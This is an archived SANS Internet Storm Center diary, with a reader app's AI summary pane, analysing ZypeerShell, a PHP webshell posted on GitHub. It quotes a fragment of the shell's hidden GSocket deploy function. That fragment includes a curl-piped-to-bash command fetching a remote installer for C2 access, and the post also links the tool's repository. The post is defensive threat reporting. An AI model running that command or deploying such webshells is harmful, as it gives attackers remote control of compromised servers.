← Back ◉ Threat Intelligence Jun 22, 2026

Webshells Remain Popular, (Mon, Jun 22nd)

SANS ISC Archived Jun 22, 2026 ✓ Full text saved

Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time to track them[3] and slighly paid less attention to them but today I found another one. It seems to be a new player (pushed on Github two months ago).

Full text archived locally

✦ AI Summary · Claude Sonnet

Webshells Remain Popular Published: 2026-06-22. Last Updated: 2026-06-22 14:10:27 UTC by Xavier Mertens (Version: 1) 0 comment(s) Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time to track them[3] and slighly paid less attention to them but today I found another one. It seems to be a new player (pushed on Github two months ago). The webshell is called ZypeerShell[4] and pretend to be "The most powerful, undetectable, and feature-rich PHP webshell available on GitHub.". The shell is classic and provides most of the expected features for such tool: I won't review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. By example, the function zypeergsdeploy() helps to connect to a C2 server through GSocket function zypeergsdeploy() { zypeerhead(); echo '<div class="header"><center><p><div class="txtfont_header">| GSocket Deploy Tool |</div></p></center><br>'; echo '<div style="text-align:center;max-width:800px;margin:20px auto;color:#ccc;">'; echo 'This tool runs the official GSocket installation command:<br>'; echo '<code style="background:#222;padding:8px 12px;font-size:15px;">bash -c "$(curl -fsSL https://gsocket.io/y)"</code><br><br>'; echo 'After installation, it will show a secret token and connection command (like gs-netcat -s "XXXX" -i).<br>'; echo 'Click "Run" below to execute it directly.'; echo '</div><br><hr><br>'; if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') { [...] This function is never called! Note that the Github repository contains a version obfusctated with Fortress Layer, a multi-layer loader with integrity checks. Zypeer is also referenced as a red-team tool on a Telegram channel: ??????? [1] https://isc.sans.edu/diary/Webshells+Webshells+everywhere/28106 [2] https://isc.sans.edu/diary/Webshell+looking+for+interesting+files/23567 [3] https://owasp.org/www-chapter-belgium/assets/2017/2017-05-29/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf??????? [4] https://github.com/sagsooz/ZypeerShell??????? Xavier Mertens (@xme) Xameco Senior ISC Handler - Freelance Cyber Security Consultant PGP Key Keywords: Webshell Zypeer 0 comment(s)

💬 Team Notes